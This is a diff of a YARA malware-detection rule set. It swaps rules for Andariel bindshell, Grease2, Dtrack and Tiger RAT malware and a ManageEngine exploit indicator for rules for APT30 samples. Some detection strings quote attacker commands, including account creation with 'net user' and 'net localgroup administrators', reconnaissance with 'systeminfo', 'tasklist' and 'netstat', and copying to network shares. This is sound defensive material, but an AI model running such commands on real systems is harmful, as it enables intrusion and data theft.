 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3b57eb6c6b89e93863b9600c4a1384f3e064f236e827ef9ffc37b1e5dcff7d24"
-		score = 80
+		hash = "57169cb4b8ef7a0d7ebd7aa039d1a1efd6eb639e"
+		logic_hash = "1fe5be3a88859fd3d485adfba92cf117afedc739bd0a46c039124919c3b81361"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a = "found mac address"
-		$b = "RecvThread"
-		$c = "OpenSSL-1.0.0-fipps"
-		$d = "Disconnected!"
+		$s1 = "Copyright (c) 2007 Microfost All Rights Reserved" fullword wide
+		$s2 = "Microfost" fullword wide
 
 	condition:
-		uint32( 0 ) == 0x464c457f and all of them
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_MAL_APT_NK_Andariel_Bindshell : FILE
+rule SIGNATURE_BASE_APT30_Generic_K : FILE
 {
 	meta:
-		description = "Detects a BindShell used by Andariel"
-		author = "CISA.gov"
-		id = "3f6d83da-cea5-5e12-b0ba-93ace09d3d5c"
-		date = "2024-07-25"
-		modified = "2026-01-29"
-		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_andariel_jul24.yar#L309-L328"
+		description = "FireEye APT30 Report Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "49629825-4233-5d74-b763-b2500536eb90"
+		date = "2015-04-03"
+		modified = "2023-01-06"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L887-L917"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "409aa6a27d81e14ea90d90ee02924cb11f5fecef592e6577b084f9ab2dde35fc"
-		score = 50
+		hash = "142bc01ad412799a7f9ffed994069fecbd5a2f93"
+		logic_hash = "eed03bb4290eef0ad1cf362a157923aa1fb8faa9305b5aaba3563d0a4e65e1a5"
+		score = 75
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$str_comspec = "COMSPEC"
-		$str_consolewindow = "GetConsoleWindow"
-		$str_ShowWindow = "ShowWindow"
-		$str_WSASocketA = "WSASocketA"
-		$str_CreateProcessA = "CreateProcessA"
-		$str_port = { B9 4D 05 00 00 89 }
+		$x1 = "Maybe a Encrypted Flash" fullword ascii
+		$s0 = "C:\\Program Files\\Common Files\\System\\wab32" fullword ascii
+		$s1 = "\\TEMP\\" ascii
+		$s2 = "\\Temporary Internet Files\\" ascii
+		$s5 = "%s Size:%u Bytes" fullword ascii
+		$s7 = "$.DATA$" fullword ascii
+		$s10 = "? Size:%u By s" fullword ascii
+		$s12 = "Maybe a Encrypted Flash" fullword ascii
+		$s14 = "Name:%-32s" fullword ascii
+		$s15 = "NickName:%-32s" fullword ascii
+		$s19 = "Email:%-32s" fullword ascii
+		$s21 = "C:\\Prog" ascii
+		$s22 = "$LDDATA$" ascii
+		$s31 = "Copy File %s OK!" fullword ascii
+		$s32 = "%s Space:%uM,FreeSpace:%uM" fullword ascii
+		$s34 = "open=%s" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and ( all of ( $x* ) and 3 of ( $s* ) )
 }
-rule SIGNATURE_BASE_MAL_APT_NK_Andariel_Grease2 : FILE
+rule SIGNATURE_BASE_APT30_Sample_33 : FILE
 {
 	meta:
-		description = "Detects the Grease2 malware family used by Andariel"
-		author = "CISA.gov (modified by Florian Roth, Nextron Systems)"
-		id = "4defbe08-b3c6-5ab9-9a57-cec57ff42d9a"
-		date = "2024-07-25"
-		modified = "2024-07-26"
-		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_andariel_jul24.yar#L330-L351"
+		description = "FireEye APT30 Report Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "be6afc4a-97fe-56ba-b057-e21415f9833d"
+		date = "2015-04-13"
+		modified = "2023-12-05"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L919-L939"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "138fc915206e0c2834090ebc0a808913488121d51c17de3dbfadcb4099fbfa2f"
-		score = 80
+		hash = "72c568ee2dd75406858c0294ccfcf86ad0e390e4"
+		logic_hash = "295c2d9fcf1c3bab54650fd1d203dfb8c12269945aad8927066ef6f815abea69"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$str_rdpconf = "emp\\RDPConf.exe"
-		$str_rdpwinst = "emp\\RDPWInst.exe"
-		$str_net_user = "net user"
-		$str_admins_add = "net localgroup administrators"
+		$s0 = "Version 4.7.3001" fullword wide
+		$s1 = "msmsgr.exe" fullword wide
+		$s2 = "MYUSER32.dll" fullword ascii
+		$s3 = "MYADVAPI32.dll" fullword ascii
+		$s4 = "CeleWare.NET1" fullword ascii
+		$s6 = "MYMSVCRT.dll" fullword ascii
+		$s7 = "Microsoft(R) is a registered trademark of Microsoft Corporation in the" wide
+		$s8 = "WWW.CeleWare.NET1" ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and 6 of them
 }
-rule SIGNATURE_BASE_MAL_APT_NK_Andariel_Nopineapple_Dtrack_Unpacked : FILE
+rule SIGNATURE_BASE_APT30_Sample_34 : FILE
 {
 	meta:
-		description = "Detects the Dtrack variant used by Andariel"
-		author = "CISA.gov"
-		id = "6ccaf24b-c110-5788-a792-fa7f39fb18f7"
-		date = "2024-07-25"
-		modified = "2026-01-29"
-		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_andariel_jul24.yar#L353-L368"
+		description = "FireEye APT30 Report Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "a4802e13-4151-5f17-ba91-dcf9ef6b52bb"
+		date = "2015-04-13"
+		modified = "2023-12-05"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L941-L960"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "cf5f92a66ba3ff4db61102dcc50b781e8dd14ca7cb1eb70dae8eba2ed0910b66"
-		score = 80
+		hash = "216868edbcdd067bd2a9cce4f132d33ba9c0d818"
+		logic_hash = "2406f9613585669f88c389ea9729a089f6aef13fba46d60b713f51cd3a946b5d"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$str_nopineapple = "< No Pineapple! >"
-		$str_qt_library = "Qt 5.12.10"
-		$str_xor = { 8B 10 83 F6 ?? 83 FA 01 77 }
+		$s0 = "dizhi.gif" ascii
+		$s1 = "eagles.vip.nse" ascii
+		$s4 = "o%S:S0" ascii
+		$s5 = "la/4.0" ascii
+		$s6 = "s#!<4!2>s02==<'s1" ascii
+		$s7 = "HlobalAl" ascii
+		$s9 = "vcMicrosoftHaveAck7" ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_MAL_APT_NK_Andariel_Dtrack_Unpacked : FILE
+rule SIGNATURE_BASE_APT30_Sample_35 : FILE
 {
 	meta:
-		description = "Detects DTrack variant used by Andariel"
-		author = "CISA.gov (modified by Florian Roth, Nextron Systems)"
-		id = "0c161275-2b2e-51a4-9e08-c118fb4c8671"
-		date = "2024-07-25"
-		modified = "2024-07-26"
-		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_andariel_jul24.yar#L370-L393"
+		description = "FireEye APT30 Report Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "8a30720b-06da-5a82-8bab-bf06121afd68"
+		date = "2015-04-13"
+		modified = "2023-12-05"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L962-L977"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d8de583fc0de01e6784305d28dbf7cea859a24cf4df1dc59356601bc830e4770"
+		hash = "df48a7cd6c4a8f78f5847bad3776abc0458499a6"
+		logic_hash = "a70d9471215ddcfe84a39b33f53c4114b205aa2cc95cd93081afe442ee2b8b42"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x_str_cmd_4 = "/c systeminfo > \"%s\" & tasklist > \"%s\" & netstat -naop tcp > \"%s\"" wide
-		$x_str_cmd_2 = "/c ping -n 3 127.0.01 > NUL % echo EEE > \"%s\"" wide
-		$str_mutex = "MTX_Global"
-		$str_cmd_1 = "/c net use \\\\" wide
-		$str_cmd_3 = "/c move /y %s \\\\" wide
+		$s0 = "WhBoyIEXPLORE.EXE.exe" fullword ascii
+		$s5 = "Startup>A" fullword ascii
+		$s18 = "olhelp32Snapshot" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( 1 of ( $x* ) or 3 of them )
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_MAL_APT_NK_Andariel_Tigerrat_Crowdsourced_Rule : FILE
+rule SIGNATURE_BASE_APT30_Sample_1 : FILE
 {
 	meta:
-		description = "Detects the Tiger RAT variant used by Andariel"
-		author = "CISA.gov (modified by Florian Roth, Nextron Systems)"
-		id = "6be65222-7d3c-5ff5-a9c7-d91dcf1deaa6"
-		date = "2024-07-25"
-		modified = "2024-07-26"
-		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_andariel_jul24.yar#L395-L424"
+		description = "FireEye APT30 Report Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e5dd6bc9-9383-5d48-92df-709996373655"
+		date = "2015-04-13"
+		modified = "2023-12-05"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L979-L996"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5d203d8c7e624796571f4597f70be0b8303f21c096640f25018cad29d4abc05b"
+		hash = "8cea83299af8f5ec6c278247e649c9d91d4cf3bc"
+		logic_hash = "5f20b60b8721d62731708630a3443741c956304c553f651572282336995f6d4f"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$m1 = ".?AVModuleKeyLogger@@" fullword ascii
-		$m2 = ".?AVModulePortForwarder@@" fullword ascii
-		$m3 = ".?AVModuleScreenCapture@@" fullword ascii
-		$m4 = ".?AVModuleShell@@" fullword ascii
-		$s1 = "\\x9891-009942-xnopcopie.dat" fullword wide
-		$s2 = "(%02d : %02d-%02d %02d:%02d:%02d)--- %s[Clipboard]" fullword ascii
-		$s3 = "[%02d : %02d-%02d %02d:%02d:%02d]--- %s[Title]" fullword ascii
-		$s4 = "del \"%s\"%s \"%s\" goto " ascii
+		$s0 = "#hostid" fullword ascii
+		$s1 = "\\Windows\\C" ascii
+		$s5 = "TimUmove" fullword ascii
+		$s6 = "Moziea/4.0 (c" fullword ascii
+		$s7 = "StartupNA" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or ( all of ( $m* ) and 1 of ( $s* ) ) or ( 2 of ( $m* ) and 2 of ( $s* ) ) )
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_MAL_APT_NK_WIN_Tiger_RAT_Auto : FILE
+rule SIGNATURE_BASE_APT30_Generic_1 : FILE
 {
 	meta:
-		description = "Detects the Tiger RAT variant used by Andariel"
-		author = "CISA.gov"
-		id = "4579af62-52be-5f5f-a577-16ec50297c05"
-		date = "2024-07-25"
-		modified = "2026-01-29"
-		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_andariel_jul24.yar#L426-L565"
+		description = "FireEye APT30 Report Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "4d21f402-24da-5e38-9225-a1461e61802f"
+		date = "2015-04-13"
+		modified = "2023-12-05"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L998-L1031"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1deef66efb44c0d17f33508a8b6f0d6253f0308f309e81657f78eb0f87121bf5"
+		logic_hash = "0a2d4e8583286a3f44b49dc902143ee1ea321d26275c6cbcd54876e94b8cd2a3"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "aaa5c64200ff0818c56ebe4c88bcc1143216c536"
+		hash1 = "cb4263cab467845dae9fae427e3bbeb31c6a14c2"
+		hash2 = "b69b95db8a55a050d6d6c0cba13d73975b8219ca"
+		hash3 = "5c29e21bbe8873778f9363258f5e570dddcadeb9"
+		hash4 = "d5cb07d178963f2dea2c754d261185ecc94e09d6"
+		hash5 = "626dcdd7357e1f8329e9137d0f9883f57ec5c163"
+		hash6 = "843997b36ed80d3aeea3c822cb5dc446b6bfa7b9"
 
 	strings:
-		$sequence_0 = { 33 c0 89 44 24 38 89 44 24 30 44 8b cf 45 33 c0 }
-		$sequence_1 = { 41 b9 01 00 00 00 48 8b d6 48 8b cb e8 ?? ?? ?? ?? }
-		$sequence_2 = { 48 81 ec 90 05 00 00 8b 01 89 85 c8 04 00 00 8b 41 04 }
-		$sequence_3 = { 48 8b 01 ff 10 48 8b 4f 08 4c 8d 4c 24 30 }
-		$sequence_4 = { 48 8b 01 ff 10 48 8b 4e 18 48 8b 01 }
-		$sequence_5 = { 48 81 ec a0 00 00 00 33 c0 48 8b d9 48 8d 4c 24 32 }
-		$sequence_6 = { 48 8b 01 eb 03 48 8b c1 0f b6 00 }
-		$sequence_7 = { 48 8b 01 8b 10 89 51 24 44 8b 41 24 45 85 c0 }
-		$sequence_8 = { 4c 8d 0d 31 eb 00 00 c1 e9 18 c1 e8 08 41 bf 00 00 00 80 }
-		$sequence_9 = { 48 8b d8 48 85 c0 75 2d ff 15 ?? ?? ?? ?? 83 f8 57 0f 85 e0 01 00 00 48 8d 0d a0 bd 00 00 }
-		$sequence_10 = { 75 d4 48 8d 1d 7f 6c 01 00 48 8b 4b f8 48 85 c9 74 0b }
-		$sequence_11 = { 0f 85 d9 00 00 00 48 8d 15 d0 c9 00 00 41 b8 10 20 01 00 48 8b cd e8 ?? ?? ?? ?? eb 6b b9 f4 ff ff ff }
-		$sequence_12 = { 48 89 0d ?? ?? ?? ?? 48 89 05 ?? ?? ?? ?? 48 8d 05 ae 61 00 00 48 89 05 ?? ?? ?? ?? 48 8d 05 a0 55 00 00 48 89 05 ?? ?? ?? ?? }
-		$sequence_13 = { 8b cf e8 ?? ?? ?? ?? 48 8b 7c 24 48 85 c0 0f 84 40 03 00 00 48 8d 05 60 25 01 00 }
-		$sequence_14 = { ff 15 ?? ?? ?? ?? 8b 05 ?? ?? ?? ?? 23 05 ?? ?? ?? ?? ba 02 00 00 00 33 c9 89 05 ?? ?? ?? ?? 8b 05 ?? ?? ?? ?? }
-		$sequence_15 = { 48 83 ec 30 49 8b d8 e8 ?? ?? ?? ?? 48 8b c8 48 85 c0 }
+		$s0 = "%s\\%s.txt" fullword
+		$s1 = "\\ldsysinfo.txt"
+		$s4 = "(Extended Wansung)" fullword
+		$s6 = "Computer Name:" fullword
+		$s7 = "%s %uKB %04u-%02u-%02u %02u:%02u" fullword
+		$s8 = "ASSAMESE" fullword
+		$s9 = "BELARUSIAN" fullword
+		$s10 = "(PR China)" fullword
+		$s14 = "(French)" fullword
+		$s15 = "AdvancedServer" fullword
+		$s16 = "DataCenterServer" fullword
+		$s18 = "(Finland)" fullword
+		$s19 = "%s %04u-%02u-%02u %02u:%02u" fullword
+		$s20 = "(Chile)" fullword
 
 	condition:
-		filesize < 600KB and 7 of them
+		filesize < 250KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_MAL_APT_NK_WIN_Dtrack_Auto : FILE
+rule SIGNATURE_BASE_APT30_Generic_2 : FILE
 {
 	meta:
-		description = "Detects DTrack variant used by Andariel"
-		author = "CISA.gov"
-		id = "1b40c685-beba-50fa-b484-c1526577cb23"
-		date = "2024-07-25"
-		modified = "2026-01-29"
-		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_andariel_jul24.yar#L567-L706"
+		description = "FireEye APT30 Report Sample - from many files"
+		author = "Florian Roth (Nextron Systems)"
+		id = "60d7d661-50e8-5a9b-8366-eda8ff8ad9d4"
+		date = "2015-04-13"
+		modified = "2023-12-05"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L1032-L1087"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2bd68ee6e5f35a9b80c07120beba3fe1f3ba9a9137ee15bb04bb2740381a9a44"
+		logic_hash = "56c9e58298c318b6dff2cce0ab896bb7bdd22429e6015b8fe72b8ad2f1f69d30"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "aba8b9fa213e5e2f1f0404d13fecc20ea8651b57"
+		hash1 = "7f11f5c9475240e5dd2eea7726c9229972cffc1f"
+		hash2 = "94d3f91d1e50ecea729617729013c3d143bf2c3e"
+		hash3 = "7e516ec04f28c76d67b8111ddfe58bbd628362cc"
+		hash4 = "6b27bc0b0460b0a25b45d897ed4f399106c284d9"
+		hash5 = "6df5b4b3da0964153bad22fb1f69483ae8316655"
+		hash6 = "b68bce61dfd8763c3003480ba4066b3cb1ef126e"
+		hash7 = "cc124682246d098740cfa7d20aede850d49b6597"
+		hash8 = "1ef415bca310575944934fc97b0aa720943ba512"
+		hash9 = "0559ab9356dcc869da18b2c96f48b76478c472b3"
+		hash10 = "f15272042a4f9324ad5de884bd50f4072f4bdde3"
+		hash11 = "1d93d5f5463cdf85e3c22c56ed1381957f4efaac"
+		hash12 = "b6f1fb0f8a2fb92a3c60e154f24cfbca1984529f"
+		hash13 = "9967a99a1b627ddb6899919e32a0f544ea498b48"
+		hash14 = "95a3c812ca0ad104f045b26c483495129bcf37ca"
+		hash15 = "bde9a72b2113d18b4fa537cc080d8d8ba1a231e8"
+		hash16 = "ce1f53e06feab1e92f07ed544c288bf39c6fce19"
+		hash17 = "72dae031d885dbf492c0232dd1c792ab4785a2dc"
+		hash18 = "a2ccba46e40d0fb0dd3e1dba160ecbb5440862ec"
+		hash19 = "c8007b59b2d495029cdf5b7b8fc8a5a1f7aa7611"
+		hash20 = "9c6f470e2f326a055065b2501077c89f748db763"
+		hash21 = "af3e232559ef69bdf2ee9cd96434dcec58afbe5a"
+		hash22 = "e72e67ba32946c2702b7662c510cc1242cffe802"
+		hash23 = "8fc0b1618b61dce5f18eba01809301cb7f021b35"
+		hash24 = "6a8159da055dac928ba7c98ea1cdbe6dfb4a3c22"
+		hash25 = "47463412daf0b0a410d3ccbb7ea294db5ff42311"
+		hash26 = "e6efa0ccfddda7d7d689efeb28894c04ebc72be2"
+		hash27 = "43a3fc9a4fee43252e9a570492e4efe33043e710"
+		hash28 = "7406ebef11ca9f97c101b37f417901c70ab514b1"
+		hash29 = "53ed9b22084f89b4b595938e320f20efe65e0409"
 
 	strings:
-		$sequence_0 = { 52 8b 45 08 50 e8 ?? ?? ?? ?? 83 c4 14 8b 4d 10 51 }
-		$sequence_1 = { 3a 41 01 75 23 83 85 4c f6 ff ff 02 83 85 50 f6 ff ff 02 80 bd 4a f6 ff ff 00 75 ae c7 85 44 f6 ff ff 00 00 00 00 }
-		$sequence_2 = { 50 ff 15 ?? ?? ?? ?? a3 ?? ?? ?? ?? 68 ?? ?? ?? ?? e8 ?? ?? ?? ?? 83 c4 04 50 }
-		$sequence_3 = { 8d 8d d4 fa ff ff 51 e8 ?? ?? ?? ?? 83 c4 08 8b 15 ?? ?? ?? ?? }
-		$sequence_4 = { 88 55 f5 6a 5c 8b 45 0c 50 e8 ?? ?? ?? ?? }
-		$sequence_5 = { 51 e8 ?? ?? ?? ?? 83 c4 10 8b 55 8c 52 }
-		$sequence_6 = { 8b 4d 0c 51 68 ?? ?? ?? ?? 8d 95 60 ea ff ff 52 e8 ?? ?? ?? ?? }
-		$sequence_7 = { 83 c0 01 89 45 f4 83 7d f4 20 7d 2c 8b 4d f8 }
-		$sequence_8 = { 83 c0 01 89 85 6c f6 ff ff 8b 8d 70 f6 ff ff 8a 11 }
-		$sequence_9 = { 03 55 f0 0f b6 02 0f b6 4d f7 33 c1 0f b6 55 fc 33 c2 }
-		$sequence_10 = { d1 e9 89 4d f8 8b 55 18 89 55 fc c7 45 f0 00 00 00 00 }
-		$sequence_11 = { 8b 4d f0 3b 4d 10 0f 8d 90 00 00 00 8b 55 08 03 55 f0 0f b6 02 }
-		$sequence_12 = { 89 4d 14 8b 45 f8 c1 e0 18 8b 4d fc c1 e9 08 0b c1 }
-		$sequence_13 = { 0b c1 89 45 18 8b 55 14 89 55 f8 }
-		$sequence_14 = { 8b 55 14 89 55 f8 8b 45 18 89 45 fc e9 ?? ?? ?? ?? 8b e5 }
+		$s0 = "%s\\%s\\KB985109.log" fullword
+		$s1 = "%s\\%s\\KB989109.log" fullword
+		$s2 = "Opera.exe" fullword wide
+		$s3 = "%s:All online success on %u!" fullword
+		$s4 = "%s:list online success on %u!" fullword
+		$s5 = "%s:All online fail!" fullword
+		$s6 = "Copyright Opera Software 1995-" wide
+		$s7 = "%s:list online fail!" fullword
+		$s8 = "OnlineTmp.txt" fullword
+		$s9 = "Opera Internet Browser" fullword wide
+		$s12 = "Opera Software" fullword wide
+		$s15 = "Check lan have done!!!" fullword
+		$s16 = "List End." fullword
 
 	condition:
-		filesize < 1700KB and 7 of them
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_EXPL_Manageengine_CVE_2022_47966_Jan23_1
+rule SIGNATURE_BASE_APT30_Generic_4 : FILE
 {
 	meta:
-		description = "Detects indicators of exploitation of ManageEngine vulnerability as described by Horizon3"
+		description = "FireEye APT30 Report Sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "07535b9c-8611-5a46-bcd7-f94070de2aea"
-		date = "2023-01-13"
+		id = "2b246ae2-ec7d-5813-913e-729e4192da59"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "https://www.horizon3.ai/manageengine-cve-2022-47966-iocs/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_manageengine_jan23.yar#L2-L14"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L1110-L1140"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a62064e4f12632ba6c14cbbd9369ee919536334f19021a177c126b5dff7e568c"
+		logic_hash = "d6a45baee2741c5ebb05fc3f17974a041cd37f665df1e67934b0928fc75f37c3"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "bb390f99bfde234bbed59f6a0d962ba874b2396c"
+		hash1 = "b47e20ac5889700438dc241f28f4e224070810d2"
+		hash2 = "a9a50673ac000a313f3ddba55d63d9773b9f4143"
+		hash3 = "ac96d7f5957aef09bd983465c497de24c6d17a92"
 
 	strings:
-		$ = "]: com.adventnet.authentication.saml.SamlException: Signature validation failed. SAML Response rejected|"
+		$s0 = "del NetEagle_Scout.bat" fullword
+		$s1 = "NetEagle_Scout.bat" fullword
+		$s2 = "\\visit.exe"
+		$s3 = "\\System.exe"
+		$s4 = "\\System.dat"
+		$s5 = "\\ieupdate.exe"
+		$s6 = "GOTO ERROR" fullword
+		$s7 = ":ERROR" fullword
+		$s9 = "IF EXIST " fullword
+		$s10 = "ioiocn" fullword
+		$s11 = "SetFileAttribute" fullword
+		$s12 = "le_0*^il" fullword
+		$s13 = "le_.*^il" fullword
+		$s14 = "le_-*^il" fullword
 
 	condition:
-		1 of them
+		filesize < 250KB and uint16( 0 ) == 0x5A4D and all of them
 }
-
-rule SIGNATURE_BASE_KHRAT_Malware : FILE
+rule SIGNATURE_BASE_APT30_Generic_5 : FILE
 {
 	meta:
-		description = "Detects an Imphash of KHRAT malware"
+		description = "FireEye APT30 Report Sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3e6a5aca-9898-5864-8974-ca4adf272893"
-		date = "2017-08-31"
+		id = "e00a670e-cd95-515f-8109-219ce5121ba4"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "https://researchcenter.paloaltonetworks.com/2017/08/unit42-updated-khrat-malware-used-in-cambodia-attacks/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_khrat.yar#L13-L24"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L1142-L1163"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "cfc1a9fb4dbec4deb70616ab7c4cce3cf56429f61fd36f78245621527d011e20"
+		logic_hash = "a9d93d7dbf8c5e97ce77cf3fef4941a01c5b1c6bcee40c6f4ca7117d8aee289e"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "53e27fd13f26462a58fa5587ecd244cab4da23aa80cf0ed6eb5ee9f9de2688c1"
+		super_rule = 1
+		hash0 = "cb4833220c508182c0ccd4e0d5a867d6c4e675f8"
+		hash1 = "dfc9a87df2d585c479ab02602133934b055d156f"
+		hash2 = "bf59d5ff7d38ec5ffb91296e002e8742baf24db5"
+
+	strings:
+		$s0 = "regsvr32 /s \"%ProgramFiles%\\Norton360\\Engine\\5.1.0.29\\ashelper.dll\"" fullword
+		$s1 = "name=\"ftpserver.exe\"/>" fullword
+		$s2 = "LiveUpdate.EXE" fullword wide
+		$s3 = "<description>FTP Explorer</description>" fullword
+		$s4 = "\\ashelper.dll"
+		$s5 = "LiveUpdate" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and pe.imphash ( ) == "6a8478ad861f98f8428a042f74de1944"
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_MAL_KHRAT_Script
+rule SIGNATURE_BASE_APT30_Generic_6 : FILE
 {
 	meta:
-		description = "Rule derived from KHRAT script but can match on other malicious scripts as well"
+		description = "FireEye APT30 Report Sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fd345647-4887-560e-a6b2-129a880026aa"
-		date = "2017-08-31"
+		id = "dfd104bd-daf4-593a-b161-61f43aec048c"
+		date = "2015-04-13"
